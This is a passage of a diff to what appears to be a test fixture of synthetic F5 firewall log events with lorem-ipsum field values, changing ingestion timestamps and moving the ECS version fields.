bigip_mgmt_ip=10.182.213.195 context_name=tconse context_type=eumf date_time=Jan 12 2018 22:18:32 dest_ip=10.200.94.145 dst_geo=doconse dest_port=5211 device_product=uis device_vendor=lill device_version=1.6057 drop_reason=imi errdefs_msgno=animi errdefs_msg_name=edutpers flow_id=pisci ip_protocol=tcp severity=very-high partition_name=umto route_domain=xercit sa_translation_pool=lam sa_translation_type=asnu source_ip=10.122.133.162 src_geo=eriam source_port=4838 source_user=aquae translated_dest_ip=10.220.202.102 translated_dest_port=10 translated_ip_protocol=iaturE translated_route_domain=epor translated_source_ip=10.195.139.25 translated_source_port=5566 translated_vlan=tper vlan=4341", "event": { - "ingested": "2021-06-09T10:31:51.965446Z" + "ingested": "2021-12-14T14:42:50.150097781Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tconsect pariat iutal3376.api.corp isi idexeac ntu [F5@tdolo acl_policy_name=nimve acl_policy_type=duntut acl_rule_name=emporin action=Reject hostname=ptat3230.domain bigip_mgmt_ip=10.156.208.5 context_name=tlaboru context_type=tec date_time=Jan 27 2018 05:21:06 dest_ip=10.9.69.13 dst_geo=uatD dest_port=6508 device_product=antium device_vendor=remaper device_version=1.3297 drop_reason=ntNequ errdefs_msgno=anim errdefs_msg_name=uae flow_id=ata ip_protocol=tcp severity=very-high partition_name=paq route_domain=emipsumq sa_translation_pool=culpaq sa_translation_type=quamq source_ip=10.53.72.161 src_geo=pta source_port=4723 source_user=scip translated_dest_ip=10.33.143.163 translated_dest_port=5404 translated_ip_protocol=iusmodi translated_route_domain=esciun translated_source_ip=10.247.144.9 translated_source_port=2494 translated_vlan=lit vlan=4112", "event": { - "ingested": "2021-06-09T10:31:51.965451100Z" + "ingested": "2021-12-14T14:42:50.150098168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oidentsu oditau onsec1632.internal.lan lup aeca isau [F5@giat acl_policy_name=ttenb acl_policy_type=eirure acl_rule_name=boreetd action=Closed hostname=exer447.internal.localhost bigip_mgmt_ip=10.35.190.164 context_name=radipis context_type=lore date_time=Feb 10 2018 12:23:41 dest_ip=10.76.99.144 dst_geo=eufugia dest_port=2345 device_product=pariat device_vendor=nimip device_version=1.2476 drop_reason=usci errdefs_msgno=unturmag errdefs_msg_name=dexeaco flow_id=lupta ip_protocol=ggp severity=very-high partition_name=oreeufug route_domain=Quisa sa_translation_pool=quiav sa_translation_type=ctionofd source_ip=10.21.58.162 src_geo=uisautei source_port=7881 source_user=porin translated_dest_ip=10.241.143.145 translated_dest_port=6151 translated_ip_protocol=ecillum translated_route_domain=olor translated_source_ip=10.113.65.192 translated_source_port=7807 translated_vlan=conseq vlan=6079", "event": { - "ingested": "2021-06-09T10:31:51.965456Z" + "ingested": "2021-12-14T14:42:50.150098625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edutpers ctobeat upta4358.home orem inibus secte [F5@ctobeat acl_policy_name=onsec acl_policy_type=idestl acl_rule_name=litani action=Closed hostname=itanimi1934.home bigip_mgmt_ip=10.19.154.103 context_name=ittenb context_type=tobeatae date_time=Feb 24 2018 19:26:15 dest_ip=10.235.51.61 dst_geo=exe dest_port=1872 device_product=cia device_vendor=idolo device_version=1.768 drop_reason=pitlabo errdefs_msgno=tas errdefs_msg_name=rcitat flow_id=ree ip_protocol=tcp severity=very-high partition_name=quipexea route_domain=orsitv sa_translation_pool=dunt sa_translation_type=int source_ip=10.53.27.253 src_geo=temveleu source_port=3599 source_user=luptat translated_dest_ip=10.75.113.240 translated_dest_port=1874 translated_ip_protocol=ionulam translated_route_domain=auto translated_source_ip=10.129.16.166 translated_source_port=5141 translated_vlan=ntocca vlan=5439", "event": { - "ingested": "2021-06-09T10:31:51.965460800Z" + "ingested": "2021-12-14T14:42:50.150099008Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tvol lup mipsamv161.local ionula pexeaco temaccu [F5@uamqua acl_policy_name=Neq acl_policy_type=runt acl_rule_name=xcep action=Established hostname=pteurs1031.mail.corp bigip_mgmt_ip=10.125.150.220 context_name=lumquid context_type=eturadip date_time=Mar 11 2018 02:28:49 dest_ip=10.241.228.95 dst_geo=equ dest_port=7256 device_product=ssequamn device_vendor=ave device_version=1.5812 drop_reason=edquia errdefs_msgno=ihi errdefs_msg_name=undeomn flow_id=ape ip_protocol=rdp severity=medium partition_name=ari route_domain=umtot sa_translation_pool=onemulla sa_translation_type=atquo source_ip=10.120.50.13 src_geo=issu source_port=4426 source_user=inculpa translated_dest_ip=10.150.153.61 translated_dest_port=2773 translated_ip_protocol=loremagn translated_route_domain=acons translated_source_ip=10.22.213.196 translated_source_port=7230 translated_vlan=emoenimi vlan=1864", "event": { - "ingested": "2021-06-09T10:31:51.965465500Z" + "ingested": "2021-12-14T14:42:50.150099393Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mqu onorume abill5290.lan mini mve tionev [F5@uasiarch acl_policy_name=velites acl_policy_type=uredolor acl_rule_name=epreh action=Accept hostname=edquiaco6562.api.lan bigip_mgmt_ip=10.113.2.13 context_name=rudexerc context_type=nturm date_time=Mar 25 2018 09:31:24 dest_ip=10.182.134.109 dst_geo=dquia dest_port=5334 device_product=bori device_vendor=dipi device_version=1.7232 drop_reason=utf errdefs_msgno=dolor errdefs_msg_name=dexe flow_id=nemul ip_protocol=igmp severity=low partition_name=lupt route_domain=quatur sa_translation_pool=dminim sa_translation_type=ptatevel source_ip=10.85.52.249 src_geo=eirured source_port=3772 source_user=tatiset translated_dest_ip=10.238.171.184 translated_dest_port=2574 translated_ip_protocol=duntutl translated_route_domain=nven translated_source_ip=10.229.155.171 translated_source_port=6978 translated_vlan=asiarch vlan=7121", "event": { - "ingested": "2021-06-09T10:31:51.965470400Z" + "ingested": "2021-12-14T14:42:50.150099779Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "utla deomni tse7542.test nesciu todit utaliqui [F5@emse acl_policy_name=emqui acl_policy_type=cipitla acl_rule_name=tlab action=Accept hostname=tatis7315.mail.home bigip_mgmt_ip=10.249.174.35 context_name=umfu context_type=utla date_time=Apr 08 2018 16:33:58 dest_ip=10.136.53.201 dst_geo=dolo dest_port=6418 device_product=samvol device_vendor=equa device_version=1.536 drop_reason=strumex errdefs_msgno=tessecil errdefs_msg_name=ugia flow_id=reprehe ip_protocol=udp severity=medium partition_name=umq route_domain=sistena sa_translation_pool=qui sa_translation_type=caboN source_ip=10.198.150.185 src_geo=catcupid source_port=3167 source_user=quela translated_dest_ip=10.51.245.225 translated_dest_port=3991 translated_ip_protocol=enimi translated_route_domain=illum translated_source_ip=10.220.1.249 translated_source_port=4200 translated_vlan=Sedut vlan=7832", "event": { - "ingested": "2021-06-09T10:31:51.965475300Z" + "ingested": "2021-12-14T14:42:50.150100178Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "audant obeata uredol2348.www5.host entorev quuntur olup [F5@aeab acl_policy_name=uradipis acl_policy_type=aerat acl_rule_name=les action=Drop hostname=eosqui3723.api.localdomain bigip_mgmt_ip=10.152.157.32 context_name=ali context_type=udexerci date_time=Apr 22 2018 23:36:32 dest_ip=10.76.232.245 dst_geo=osqu dest_port=4859 device_product=aborio device_vendor=rve device_version=1.219 drop_reason=nbyCi errdefs_msgno=runtmoll errdefs_msg_name=busBon flow_id=norumetM ip_protocol=udp severity=low partition_name=usBono route_domain=ameaq sa_translation_pool=Quis sa_translation_type=lupta source_ip=10.251.82.195 src_geo=umiure source_port=5186 source_user=olorese translated_dest_ip=10.190.96.181 translated_dest_port=2153 translated_ip_protocol=culp translated_route_domain=deomn translated_source_ip=10.38.185.31 translated_source_port=1085 translated_vlan=llo vlan=1106", "event": { - "ingested": "2021-06-09T10:31:51.965480300Z" + "ingested": "2021-12-14T14:42:50.150100563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tla iaconseq sed3235.www5.localhost pidatatn isno luptatev [F5@occaeca acl_policy_name=dan acl_policy_type=pta acl_rule_name=upt action=Drop hostname=itaedict199.mail.corp bigip_mgmt_ip=10.103.102.242 context_name=labore context_type=lorem date_time=May 07 2018 06:39:06 dest_ip=10.68.159.207 dst_geo=eratv dest_port=7206 device_product=estq device_vendor=quasiarc device_version=1.6526 drop_reason=liq errdefs_msgno=xerc errdefs_msg_name=atisetqu flow_id=squir ip_protocol=icmp severity=very-high partition_name=quam route_domain=deriti sa_translation_pool=edictasu sa_translation_type=eturadi source_ip=10.190.247.194 src_geo=mSecti source_port=4210 source_user=tDuisaut translated_dest_ip=10.230.112.179 translated_dest_port=5926 translated_ip_protocol=vol translated_route_domain=ita translated_source_ip=10.211.198.50 translated_source_port=7510 translated_vlan=nibusB vlan=5555", "event": { - "ingested": "2021-06-09T10:31:51.965485100Z" + "ingested": "2021-12-14T14:42:50.150100955Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amremap oremagna aqu4475.mail.invalid serrorsi tsedquia rsit [F5@quis acl_policy_name=upidatat acl_policy_type=mod acl_rule_name=niamqui action=Closed hostname=xeaco7887.www.localdomain bigip_mgmt_ip=10.47.223.155 context_name=ugitsed context_type=dminimve date_time=May 21 2018 13:41:41 dest_ip=10.111.137.84 dst_geo=uiac dest_port=7838 device_product=tot device_vendor=reme device_version=1.7750 drop_reason=loremi errdefs_msgno=queporro errdefs_msg_name=tur flow_id=eFi ip_protocol=ipv6-icmp severity=medium partition_name=ulapari route_domain=eporroq sa_translation_pool=uunturm sa_translation_type=iatn source_ip=10.219.83.199 src_geo=diduntut source_port=1321 source_user=ectetur translated_dest_ip=10.101.13.122 translated_dest_port=6737 translated_ip_protocol=nibusBo translated_route_domain=volup translated_source_ip=10.251.101.61 translated_source_port=5153 translated_vlan=scipit vlan=6495", "event": { - "ingested": "2021-06-09T10:31:51.965490600Z" + "ingested": "2021-12-14T14:42:50.150101346Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tore isni tamrema736.www5.lan ntiumdol conse aturve [F5@edqui acl_policy_name=tvolu acl_policy_type=psu acl_rule_name=strud action=Closed hostname=saute7421.www.invalid bigip_mgmt_ip=10.21.80.157 context_name=tiumtot context_type=tate date_time=Jun 04 2018 20:44:15 dest_ip=10.13.222.177 dst_geo=inBCSed dest_port=6353 device_product=Loremip device_vendor=taliqui device_version=1.5568 drop_reason=ipsaquae errdefs_msgno=olu errdefs_msg_name=exerci flow_id=isnostru ip_protocol=tcp severity=very-high partition_name=ngelits route_domain=volupt sa_translation_pool=billoi sa_translation_type=reseo source_ip=10.31.86.83 src_geo=pariat source_port=6646 source_user=litsed translated_dest_ip=10.21.30.43 translated_dest_port=4754 translated_ip_protocol=lorem translated_route_domain=iamquisn translated_source_ip=10.83.136.233 translated_source_port=6643 translated_vlan=imadm vlan=3187", "event": { - "ingested": "2021-06-09T10:31:51.965495600Z" + "ingested": "2021-12-14T14:42:50.150101728Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lumdol edutper utemve6966.mail.local emoen ptate mipsumqu [F5@turad acl_policy_name=dol acl_policy_type=ntutla acl_rule_name=des action=Accept hostname=oluptas1637.home bigip_mgmt_ip=10.195.90.73 context_name=ipisc context_type=iatnulap date_time=Jun 19 2018 03:46:49 dest_ip=10.170.155.137 dst_geo=uine dest_port=1815 device_product=veniamqu device_vendor=iconsequ device_version=1.5445 drop_reason=apa errdefs_msgno=archite errdefs_msg_name=tur flow_id=ddo ip_protocol=ipv6 severity=high partition_name=inBC route_domain=did sa_translation_pool=atcupi sa_translation_type=eriti source_ip=10.45.152.205 src_geo=rema source_port=5107 source_user=datatn translated_dest_ip=10.194.197.107 translated_dest_port=2524 translated_ip_protocol=tur translated_route_domain=itation translated_source_ip=10.27.181.27 translated_source_port=5509 translated_vlan=uredo vlan=2155", "event": { - "ingested": "2021-06-09T10:31:51.965500500Z" + "ingested": "2021-12-14T14:42:50.150102115Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "use catcu quame922.internal.host eursi liquid ulapari [F5@ibus acl_policy_name=isu acl_policy_type=moll acl_rule_name=roinBCS action=Drop hostname=ididu5505.api.localdomain bigip_mgmt_ip=10.43.239.97 context_name=modi context_type=cip date_time=Jul 03 2018 10:49:23 dest_ip=10.60.60.164 dst_geo=iscive dest_port=5527 device_product=incididu device_vendor=yCice device_version=1.508 drop_reason=ionem errdefs_msgno=taevitae errdefs_msg_name=dminimv flow_id=quam ip_protocol=tcp severity=low partition_name=umdol route_domain=rerepr sa_translation_pool=ipiscin sa_translation_type=trudexe source_ip=10.222.2.132 src_geo=umdo source_port=6187 source_user=aedicta translated_dest_ip=10.129.161.18 translated_dest_port=782 translated_ip_protocol=umquiad translated_route_domain=porinc translated_source_ip=10.183.90.25 translated_source_port=5038 translated_vlan=conse vlan=2563", "event": { - "ingested": "2021-06-09T10:31:51.965505500Z" + "ingested": "2021-12-14T14:42:50.150102507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dolo reeufu umexe5208.local suntex uptatema uteiru [F5@rcitati acl_policy_name=siutali acl_policy_type=uiratio acl_rule_name=ficia action=Closed hostname=mqui1099.api.corp bigip_mgmt_ip=10.231.167.171 context_name=onorumet context_type=illoinve date_time=Jul 17 2018 17:51:58 dest_ip=10.188.254.168 dst_geo=nevolup dest_port=3706 device_product=lor device_vendor=ica device_version=1.4479 drop_reason=sumd errdefs_msgno=elitse errdefs_msg_name=olu flow_id=temqu ip_protocol=rdp severity=very-high partition_name=nesci route_domain=meaquei sa_translation_pool=snisiu sa_translation_type=atem source_ip=10.189.162.131 src_geo=litsed source_port=6019 source_user=sedquia translated_dest_ip=10.67.129.100 translated_dest_port=7106 translated_ip_protocol=mmodicon translated_route_domain=eosquir translated_source_ip=10.248.156.138 translated_source_port=2125 translated_vlan=smodit vlan=3090", "event": { - "ingested": "2021-06-09T10:31:51.965510300Z" + "ingested": "2021-12-14T14:42:50.150102900Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dun xce dol5403.www.localhost asiar eiu maliquam [F5@gnama acl_policy_name=ursintoc acl_policy_type=minimve acl_rule_name=eprehe action=Reject hostname=siuta2155.lan bigip_mgmt_ip=10.63.103.30 context_name=ill context_type=imveniam date_time=Aug 01 2018 00:54:32 dest_ip=10.36.29.127 dst_geo=umqui dest_port=1757 device_product=sci device_vendor=isquames device_version=1.2927 drop_reason=tlabor errdefs_msgno=itecto errdefs_msg_name=loreeuf flow_id=orainci ip_protocol=icmp severity=low partition_name=aev route_domain=uelaudan sa_translation_pool=lab sa_translation_type=sequa source_ip=10.6.146.184 src_geo=rrorsi source_port=7247 source_user=sequu translated_dest_ip=10.185.107.27 translated_dest_port=2257 translated_ip_protocol=mips translated_route_domain=iduntutl translated_source_ip=10.142.106.66 translated_source_port=3790 translated_vlan=quelauda vlan=289", "event": { - "ingested": "2021-06-09T10:31:51.965515300Z" + "ingested": "2021-12-14T14:42:50.150103301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dolo ulamc doe344.www5.local toreve squirat llum [F5@dol acl_policy_name=niam acl_policy_type=atio acl_rule_name=sno action=Established hostname=tatiset4191.localdomain bigip_mgmt_ip=10.214.93.200 context_name=dtempor context_type=rroquisq date_time=Aug 15 2018 07:57:06 dest_ip=10.215.63.248 dst_geo=uidex dest_port=1203 device_product=lloi device_vendor=nseq device_version=1.4023 drop_reason=isetqua errdefs_msgno=ianonn errdefs_msg_name=oluptas flow_id=doe ip_protocol=udp severity=very-high partition_name=rchitect route_domain=orsitame sa_translation_pool=tasn sa_translation_type=exeaco source_ip=10.93.39.237 src_geo=aincidu source_port=232 source_user=tionofd translated_dest_ip=10.0.202.9 translated_dest_port=7451 translated_ip_protocol=nvolup translated_route_domain=ommodic translated_source_ip=10.119.179.182 translated_source_port=7255 translated_vlan=undeo vlan=7696", "event": { - "ingested": "2021-06-09T10:31:51.965520200Z" + "ingested": "2021-12-14T14:42:50.150104134Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uiinea uianonn eavolupt784.www5.example liquam sinto edi [F5@eumiure acl_policy_name=ore acl_policy_type=adeser acl_rule_name=mSe action=Drop hostname=aute2433.mail.lan bigip_mgmt_ip=10.252.204.162 context_name=tiae context_type=giat date_time=Aug 29 2018 14:59:40 dest_ip=10.115.77.51 dst_geo=mcorpor dest_port=2433 device_product=ostru device_vendor=mea device_version=1.5939 drop_reason=iquipex errdefs_msgno=byCice errdefs_msg_name=deritq flow_id=boreetdo ip_protocol=ipv6-icmp severity=medium partition_name=iin route_domain=nostr sa_translation_pool=luptatem sa_translation_type=tNequepo source_ip=10.28.145.163 src_geo=sper source_port=72 source_user=imadmin translated_dest_ip=10.123.154.140 translated_dest_port=2551 translated_ip_protocol=mSect translated_route_domain=iure translated_source_ip=10.30.189.166 translated_source_port=2749 translated_vlan=aer vlan=3422", "event": { - "ingested": "2021-06-09T10:31:51.965525Z" + "ingested": "2021-12-14T14:42:50.150104630Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "roquis mremape ude2977.www.corp rmagnido exeaco dqu [F5@ccaec acl_policy_name=repreh acl_policy_type=imven acl_rule_name=usan action=Accept hostname=idolo6535.internal.example bigip_mgmt_ip=10.46.162.198 context_name=snulap context_type=onsequat date_time=Sep 12 2018 22:02:15 dest_ip=10.166.128.248 dst_geo=pariatur dest_port=7435 device_product=tura device_vendor=equuntur device_version=1.6564 drop_reason=uaera errdefs_msgno=mqua errdefs_msg_name=xer flow_id=utlabore ip_protocol=ipv6-icmp severity=very-high partition_name=beataevi route_domain=amquisn sa_translation_pool=itquii sa_translation_type=imaven source_ip=10.145.128.250 src_geo=nder source_port=5641 source_user=eni translated_dest_ip=10.79.49.3 translated_dest_port=7794 translated_ip_protocol=psamvolu translated_route_domain=teturad translated_source_ip=10.29.122.183 translated_source_port=6166 translated_vlan=tla vlan=6146", "event": { - "ingested": "2021-06-09T10:31:51.965530300Z" + "ingested": "2021-12-14T14:42:50.150105047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "modtempo edict nost3250.internal.localdomain nibu quatur isiutali [F5@mdolo acl_policy_name=nof acl_policy_type=usantiu acl_rule_name=periam action=Closed hostname=one7728.api.localdomain bigip_mgmt_ip=10.177.232.136 context_name=obe context_type=niamqu date_time=Sep 27 2018 05:04:49 dest_ip=10.140.59.161 dst_geo=smoditem dest_port=575 device_product=tev device_vendor=oNemoeni device_version=1.3341 drop_reason=elillumq errdefs_msgno=loremeum errdefs_msg_name=luptatem flow_id=ing ip_protocol=tcp severity=very-high partition_name=riameaqu route_domain=etd sa_translation_pool=omnisi sa_translation_type=dolor source_ip=10.166.169.167 src_geo=ati source_port=1544 source_user=olors translated_dest_ip=10.65.174.196 translated_dest_port=472 translated_ip_protocol=iin translated_route_domain=uteiru translated_source_ip=10.142.235.217 translated_source_port=5846 translated_vlan=orain vlan=2663", "event": { - "ingested": "2021-06-09T10:31:51.965535100Z" + "ingested": "2021-12-14T14:42:50.150105437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "llu quaUt labor7147.internal.host ten vitae tse [F5@gni acl_policy_name=per acl_policy_type=tione acl_rule_name=nibus action=Established hostname=uptatem4446.internal.localhost bigip_mgmt_ip=10.29.217.44 context_name=eacommod context_type=tali date_time=Oct 11 2018 12:07:23 dest_ip=10.131.223.198 dst_geo=orisnisi dest_port=4342 device_product=eritquii device_vendor=atevelit device_version=1.325 drop_reason=enat errdefs_msgno=ionula errdefs_msg_name=itaed flow_id=invol ip_protocol=rdp severity=low partition_name=cidun route_domain=tassitas sa_translation_pool=nimadmi sa_translation_type=dipisci source_ip=10.215.184.154 src_geo=nor source_port=3306 source_user=iarc translated_dest_ip=10.191.78.86 translated_dest_port=6355 translated_ip_protocol=uiac translated_route_domain=squ translated_source_ip=10.53.188.140 translated_source_port=6455 translated_vlan=ten vlan=2937", "event": { - "ingested": "2021-06-09T10:31:51.965540Z" + "ingested": "2021-12-14T14:42:50.150105919Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isciveli ntutlab sitamet452.domain nsequ ing ollita [F5@dipisci acl_policy_name=amnisiu acl_policy_type=ptat acl_rule_name=epr action=Drop hostname=emq2514.api.localhost bigip_mgmt_ip=10.135.77.156 context_name=uraut context_type=non date_time=Oct 25 2018 19:09:57 dest_ip=10.248.182.188 dst_geo=turad dest_port=2537 device_product=nBCSe device_vendor=ollita device_version=1.3567 drop_reason=eni errdefs_msgno=quipe errdefs_msg_name=oluptat flow_id=stenatus ip_protocol=ggp severity=very-high partition_name=iaecon route_domain=ect sa_translation_pool=tquid sa_translation_type=seru source_ip=10.76.148.147 src_geo=remagna source_port=1121 source_user=urve translated_dest_ip=10.46.222.149 translated_dest_port=3304 translated_ip_protocol=squ translated_route_domain=emagnaal translated_source_ip=10.74.74.129 translated_source_port=5904 translated_vlan=itati vlan=3497", "event": { - "ingested": "2021-06-09T10:31:51.965545200Z" + "ingested": "2021-12-14T14:42:50.150106347Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rinc tno meumf4052.invalid pitlabo riamea Malorumw [F5@consect acl_policy_name=issu acl_policy_type=tconsect acl_rule_name=tationem action=Drop hostname=agna5654.www.corp bigip_mgmt_ip=10.96.200.223 context_name=iatisun context_type=cto date_time=Nov 09 2018 02:12:32 dest_ip=10.3.228.220 dst_geo=imadmini dest_port=3791 device_product=oeiusm device_vendor=aUtenim device_version=1.1186 drop_reason=isu errdefs_msgno=ute errdefs_msg_name=tdolore flow_id=madminim ip_protocol=igmp severity=very-high partition_name=prehen route_domain=ate sa_translation_pool=ull sa_translation_type=enimipsa source_ip=10.130.203.37 src_geo=quisnos source_port=2132 source_user=mvele translated_dest_ip=10.11.146.253 translated_dest_port=3581 translated_ip_protocol=remeum translated_route_domain=temseq translated_source_ip=10.145.49.29 translated_source_port=2464 translated_vlan=sedquia vlan=4912", "event": { - "ingested": "2021-06-09T10:31:51.965549900Z" + "ingested": "2021-12-14T14:42:50.150106778Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntmo aliqu iqu4429.www5.lan doconse volupta ptat [F5@oreverit acl_policy_name=nimides acl_policy_type=remipsum acl_rule_name=elit action=Drop hostname=ipi4827.mail.lan bigip_mgmt_ip=10.162.78.48 context_name=lab context_type=sedqui date_time=Nov 23 2018 09:15:06 dest_ip=10.243.157.94 dst_geo=epteu dest_port=5744 device_product=tura device_vendor=mquiavol device_version=1.6845 drop_reason=eabil errdefs_msgno=ibusB errdefs_msg_name=rporis flow_id=etco ip_protocol=ipv6 severity=very-high partition_name=ereprehe route_domain=olu sa_translation_pool=nofdeF sa_translation_type=riaturEx source_ip=10.24.23.209 src_geo=itautfu source_port=1503 source_user=rumwr translated_dest_ip=10.162.2.180 translated_dest_port=3889 translated_ip_protocol=mporain translated_route_domain=ectetur translated_source_ip=10.48.75.140 translated_source_port=1837 translated_vlan=ineavol vlan=5182", "event": { - "ingested": "2021-06-09T10:31:51.965554400Z" + "ingested": "2021-12-14T14:42:50.150107232Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onproid sitv equam3114.test mcorp uelaud aperiam [F5@ngelit acl_policy_name=quiano acl_policy_type=sund acl_rule_name=iaconse action=Drop hostname=sequatD163.internal.example bigip_mgmt_ip=10.151.206.38 context_name=oloremi context_type=luptate date_time=Dec 07 2018 16:17:40 dest_ip=10.38.57.217 dst_geo=rur dest_port=5543 device_product=imidest device_vendor=oeiusmod device_version=1.419 drop_reason=psumqui errdefs_msgno=eddoeiu errdefs_msg_name=oinvento flow_id=mips ip_protocol=udp severity=medium partition_name=corpor route_domain=amvolu sa_translation_pool=ent sa_translation_type=ionemu source_ip=10.66.92.83 src_geo=orinrep source_port=2549 source_user=nproide translated_dest_ip=10.119.12.186 translated_dest_port=5674 translated_ip_protocol=qui translated_route_domain=nemullam translated_source_ip=10.97.105.115 translated_source_port=3576 translated_vlan=squir vlan=3987", "event": { - "ingested": "2021-06-09T10:31:51.965558900Z" + "ingested": "2021-12-14T14:42:50.150107625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umqu umet psaquaea5284.internal.example upt giatquo toccaec [F5@nihilmo acl_policy_name=atquo acl_policy_type=umetMa acl_rule_name=ngelitse action=Accept hostname=itamet1303.invalid bigip_mgmt_ip=10.12.148.73 context_name=eius context_type=evo date_time=Dec 21 2018 23:20:14 dest_ip=10.10.44.34 dst_geo=volupt dest_port=61 device_product=eosqu device_vendor=reetdolo device_version=1.7551 drop_reason=sten errdefs_msgno=enderi errdefs_msg_name=labore flow_id=uasiarch ip_protocol=igmp severity=very-high partition_name=magnama route_domain=reprehe sa_translation_pool=citatio sa_translation_type=dolo source_ip=10.201.132.114 src_geo=eetd source_port=6058 source_user=borisnis translated_dest_ip=10.64.76.142 translated_dest_port=7083 translated_ip_protocol=temse translated_route_domain=samvo translated_source_ip=10.169.139.250 translated_source_port=1374 translated_vlan=nostrume vlan=5035", "event": { - "ingested": "2021-06-09T10:31:51.965564600Z" + "ingested": "2021-12-14T14:42:50.150108164Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tatevel itin tam942.api.host iut leumiur deser [F5@boris acl_policy_name=ris acl_policy_type=nisiuta acl_rule_name=utper action=Drop hostname=epr3512.internal.domain bigip_mgmt_ip=10.9.236.18 context_name=iumdo context_type=exe date_time=Jan 05 2019 06:22:49 dest_ip=10.152.7.48 dst_geo=giatnula dest_port=71 device_product=enimadmi device_vendor=qui device_version=1.5292 drop_reason=aecon errdefs_msgno=sedq errdefs_msg_name=olo flow_id=sperna ip_protocol=udp severity=very-high partition_name=conseq route_domain=upta sa_translation_pool=eturadi sa_translation_type=cinge source_ip=10.111.128.11 src_geo=niamq source_port=5336 source_user=umfug translated_dest_ip=10.35.38.185 translated_dest_port=7077 translated_ip_protocol=labor translated_route_domain=Sec translated_source_ip=10.200.116.191 translated_source_port=3068 translated_vlan=nsecte vlan=5790", "event": { - "ingested": "2021-06-09T10:31:51.965569800Z" + "ingested": "2021-12-14T14:42:50.150108562Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uianonnu por nve894.lan turadip ataev eFinib [F5@atione acl_policy_name=xcepte acl_policy_type=gnaa acl_rule_name=tio action=Reject hostname=uredol2174.home bigip_mgmt_ip=10.191.27.182 context_name=tMalo context_type=urautod date_time=Jan 19 2019 13:25:23 dest_ip=10.114.60.159 dst_geo=rese dest_port=5302 device_product=rissusci device_vendor=quaturve device_version=1.5991 drop_reason=tisunde errdefs_msgno=ende errdefs_msg_name=quidolor flow_id=lloin ip_protocol=igmp severity=high partition_name=proiden route_domain=moenimip sa_translation_pool=tat sa_translation_type=tate source_ip=10.236.67.227 src_geo=ern source_port=881 source_user=tlabo translated_dest_ip=10.134.238.8 translated_dest_port=2976 translated_ip_protocol=aqua translated_route_domain=edquiac translated_source_ip=10.240.62.238 translated_source_port=1251 translated_vlan=olo vlan=5926", "event": { - "ingested": "2021-06-09T10:31:51.965574800Z" + "ingested": "2021-12-14T14:42:50.150108949Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ali Nequepor aUten4127.internal.lan apariatu mnisis onsequa [F5@sunt acl_policy_name=orumSe acl_policy_type=olupta acl_rule_name=emveleum action=Drop hostname=ididunt7607.mail.localhost bigip_mgmt_ip=10.165.66.92 context_name=isq context_type=eacommo date_time=Feb 02 2019 20:27:57 dest_ip=10.244.171.198 dst_geo=nimad dest_port=7814 device_product=asi device_vendor=tobe device_version=1.6837 drop_reason=Lore errdefs_msgno=oin errdefs_msg_name=eritquii flow_id=taliqui ip_protocol=ipv6-icmp severity=very-high partition_name=entoreve route_domain=ion sa_translation_pool=exeaco sa_translation_type=tate 